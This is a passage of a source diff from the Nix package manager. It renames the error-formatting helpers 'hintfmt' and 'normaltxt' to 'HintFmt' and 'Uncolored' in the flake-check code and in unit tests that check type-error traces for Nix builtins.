} catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the overlay '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the overlay '%s'", attrPath)); reportError(e); } }; @@ -465,7 +465,7 @@ struct CmdFlakeCheck : FlakeCommand fmt("checking NixOS module '%s'", attrPath)); state->forceValue(v, pos); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the NixOS module '%s'", attrPath)); reportError(e); } }; @@ -491,7 +491,7 @@ struct CmdFlakeCheck : FlakeCommand } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the Hydra jobset '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the Hydra jobset '%s'", attrPath)); reportError(e); } }; @@ -506,7 +506,7 @@ struct CmdFlakeCheck : FlakeCommand if (!state->isDerivation(*vToplevel)) throw Error("attribute 'config.system.build.toplevel' is not a derivation"); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the NixOS configuration '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the NixOS configuration '%s'", attrPath)); reportError(e); } }; @@ -540,7 +540,7 @@ struct CmdFlakeCheck : FlakeCommand throw Error("template '%s' has unsupported attribute '%s'", attrPath, name); } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the template '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the template '%s'", attrPath)); reportError(e); } }; @@ -554,7 +554,7 @@ struct CmdFlakeCheck : FlakeCommand throw Error("bundler must be a function"); // TODO: check types of inputs/outputs? 
} catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the template '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the template '%s'", attrPath)); reportError(e); } }; @@ -774,7 +774,7 @@ struct CmdFlakeCheck : FlakeCommand warn("unknown flake output '%s'", name); } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking flake output '%s'", name)); + e.addTrace(resolve(pos), HintFmt("while checking flake output '%s'", name)); reportError(e); } }); diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 3cfa2b61b..a899d3113 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -31,14 +31,14 @@ namespace nix { } } catch (BaseError & e) { ASSERT_EQ(PrintToString(e.info().msg), - PrintToString(hintfmt("puppy"))); + PrintToString(HintFmt("puppy"))); auto trace = e.info().traces.rbegin(); ASSERT_EQ(e.info().traces.size(), 2); ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("doggy"))); + PrintToString(HintFmt("doggy"))); trace++; ASSERT_EQ(PrintToString(trace->hint), - PrintToString(hintfmt("beans"))); + PrintToString(HintFmt("beans"))); throw; } , EvalError @@ -53,6 +53,7 @@ namespace nix { state.error("beans").debugThrow(); } catch (Error & e2) { e.addTrace(state.positions[noPos], "beans2", ""); + //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); ASSERT_FALSE(&e.info() == &e2.info()); @@ -73,7 +74,7 @@ namespace nix { ASSERT_EQ(e.info().traces.size(), 1) << "while testing " args << std::endl << e.what(); \ auto trace = e.info().traces.rbegin(); \ ASSERT_EQ(PrintToString(trace->hint), \ - PrintToString(hintfmt("while calling the '%s' builtin", name))); \ + PrintToString(HintFmt("while calling the '%s' builtin", name))); \ throw; \ } \ , type \ @@ -95,7 +96,7 @@ namespace nix { PrintToString(context)); \ ++trace; \ 
ASSERT_EQ(PrintToString(trace->hint), \ - PrintToString(hintfmt("while calling the '%s' builtin", name))); \ + PrintToString(HintFmt("while calling the '%s' builtin", name))); \ throw; \ } \ , type \ @@ -104,48 +105,48 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", TypeError, - hintfmt("attribute '%s' missing", "startSet"), - hintfmt("in the attrset passed as argument to builtins.genericClosure")); + HintFmt("attribute '%s' missing", "startSet"), + HintFmt("in the attrset passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("expected a function but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); + HintFmt("expected a function but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = 
[{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); + HintFmt("expected a list but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", TypeError, - hintfmt("attribute '%s' missing", "key"), - hintfmt("in one of the attrsets generated by (or initially passed to) builtins.genericClosure")); + HintFmt("attribute '%s' missing", "key"), + HintFmt("in one of the attrsets generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [{ key = ''a''; }]; }", EvalError, - hintfmt("cannot compare %s with %s", "a string", "an integer"), - hintfmt("while comparing the `key` attributes of two genericClosure elements")); + HintFmt("cannot compare %s with %s", "a string", "an integer"), + HintFmt("while comparing the `key` attributes of two genericClosure elements")); ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - 
hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); + HintFmt("expected a set but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -153,32 +154,32 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "0" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "0" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", EvalError, - hintfmt("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths")); + HintFmt("'from' and 'to' arguments passed to builtins.replaceStrings have different lengths")); ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"oo\" ] [ 
true ] \"foo\"", TypeError, - hintfmt("expected a string but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -242,8 +243,8 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.ceil")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.ceil")); } @@ -251,8 +252,8 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.floor")); + HintFmt("expected a float but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.floor")); } @@ -264,8 +265,8 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first 
argument passed to builtins.getEnv")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -285,8 +286,8 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.placeholder")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.placeholder")); } @@ -294,13 +295,13 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.toPath")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "foo"), - hintfmt("while evaluating the first argument passed to builtins.toPath")); + HintFmt("string '%s' doesn't represent an absolute path", "foo"), + HintFmt("while evaluating the first argument passed to builtins.toPath")); } @@ -308,8 +309,8 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); + HintFmt("cannot coerce %s to a string: %s", "a Boolean", Uncolored(ANSI_CYAN "true" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -317,13 +318,13 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot 
coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while realising the context of a path")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "zorglub"), - hintfmt("while realising the context of a path")); + HintFmt("string '%s' doesn't represent an absolute path", "zorglub"), + HintFmt("while realising the context of a path")); } @@ -331,8 +332,8 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -376,30 +377,30 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); + HintFmt("cannot coerce %s to a string: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", EvalError, - hintfmt("string '%s' doesn't represent an absolute path", "foo"), - hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); + HintFmt("string '%s' doesn't represent an absolute path", "foo"), + HintFmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] ./.", TypeError, - hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), - 
hintfmt("while evaluating the first argument passed to builtins.filterSource")); + HintFmt("expected a function but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" // ASSERT_TRACE2("filterSource (_: 1) ./.", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "an integer"), - // hintfmt("while adding path '/home/layus/projects/nix'")); + // HintFmt("attempt to call something which is not a function but %s", "an integer"), + // HintFmt("while adding path '/home/layus/projects/nix'")); // ASSERT_TRACE2("filterSource (_: _: 1) ./.", // TypeError, - // hintfmt("expected a Boolean but found %s: %s", "an integer", "1"), - // hintfmt("while evaluating the return value of the path filter function")); + // HintFmt("expected a Boolean but found %s: %s", "an integer", "1"), + // HintFmt("while evaluating the return value of the path filter function")); } @@ -411,8 +412,8 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the argument passed to builtins.attrNames")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the argument passed to builtins.attrNames")); } @@ -420,8 +421,8 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the argument passed to builtins.attrValues")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the argument passed to builtins.attrValues")); } @@ -429,18 +430,18 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", 
normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.getAttr")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.getAttr")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", TypeError, - hintfmt("attribute '%s' missing", "foo"), - hintfmt("in the attribute set under consideration")); + HintFmt("attribute '%s' missing", "foo"), + HintFmt("in the attribute set under consideration")); } @@ -452,13 +453,13 @@ namespace nix { TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.hasAttr")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.hasAttr")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -470,18 +471,18 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", 
Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); + HintFmt("expected a set but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -489,28 +490,28 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the argument passed to builtins.listToAttrs")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", TypeError, - hintfmt("attribute '%s' missing", "name"), - hintfmt("in a {name=...; value=...;} pair")); + 
HintFmt("attribute '%s' missing", "name"), + HintFmt("in a {name=...; value=...;} pair")); ASSERT_TRACE2("listToAttrs [ { name = 1; } ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", TypeError, - hintfmt("attribute '%s' missing", "value"), - hintfmt("in a {name=...; value=...;} pair")); + HintFmt("attribute '%s' missing", "value"), + HintFmt("in a {name=...; value=...;} pair")); } @@ -518,13 +519,13 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -532,23 +533,23 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.catAttrs")); + HintFmt("expected a string but found %s: %s", "a list", Uncolored("[ ]")), + 
HintFmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.catAttrs")); + HintFmt("expected a list but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -556,7 +557,7 @@ namespace nix { TEST_F(ErrorTraceTest, functionArgs) { ASSERT_TRACE1("functionArgs {}", TypeError, - hintfmt("'functionArgs' requires a function")); + HintFmt("'functionArgs' requires a function")); } @@ -564,24 +565,24 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); + HintFmt("expected a set but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the second argument passed to 
builtins.mapAttrs")); // XXX: defered // ASSERT_TRACE2("mapAttrs \"\" { foo.bar = 1; }", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "a string"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "a string"), + // HintFmt("while evaluating the attribute 'foo'")); // ASSERT_TRACE2("mapAttrs (x: x + \"1\") { foo.bar = 1; }", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "a string"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "a string"), + // HintFmt("while evaluating the attribute 'foo'")); // ASSERT_TRACE2("mapAttrs (x: y: x + 1) { foo.bar = 1; }", // TypeError, - // hintfmt("cannot coerce %s to a string", "an integer"), - // hintfmt("while evaluating a path segment")); + // HintFmt("cannot coerce %s to a string", "an integer"), + // HintFmt("while evaluating a path segment")); } @@ -589,27 +590,27 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), - hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); + HintFmt("expected a function but found %s: %s", "a list", Uncolored("[ ]")), + HintFmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); + HintFmt("expected a set but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes 
two arguments ? // The same question also applies to sort, and maybe others. // Due to lazyness, we only create a thunk, and it fails later on. // ASSERT_TRACE2("zipAttrsWith (_: 1) [ { foo = 1; } ]", // TypeError, - // hintfmt("attempt to call something which is not a function but %s", "an integer"), - // hintfmt("while evaluating the attribute 'foo'")); + // HintFmt("attempt to call something which is not a function but %s", "an integer"), + // HintFmt("while evaluating the attribute 'foo'")); // XXX: Also deferred deeply // ASSERT_TRACE2("zipAttrsWith (a: b: a + b) [ { foo = 1; } { foo = 2; } ]", // TypeError, - // hintfmt("cannot coerce %s to a string", "a list"), - // hintfmt("while evaluating a path segment")); + // HintFmt("cannot coerce %s to a string", "a list"), + // HintFmt("while evaluating a path segment")); } @@ -621,16 +622,16 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.elemAt")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", Error, - hintfmt("list index %d is out of bounds", -1)); + HintFmt("list index %d is out of bounds", -1)); ASSERT_TRACE1("elemAt [\"foo\"] 3", Error, - hintfmt("list index %d is out of bounds", 3)); + HintFmt("list index %d is out of bounds", 3)); } @@ -638,12 +639,12 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.elemAt")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while 
evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", Error, - hintfmt("list index %d is out of bounds", 0)); + HintFmt("list index %d is out of bounds", 0)); } @@ -651,12 +652,12 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.tail")); + HintFmt("expected a list but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", Error, - hintfmt("'tail' called on an empty list")); + HintFmt("'tail' called on an empty list")); } @@ -664,13 +665,13 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.map")); + HintFmt("expected a list but found %s: %s", "a string", Uncolored(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), + HintFmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.map")); + HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.map")); } @@ -678,18 +679,18 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), - hintfmt("while evaluating the second argument passed to builtins.filter")); + HintFmt("expected a list but found %s: %s", "a string", 
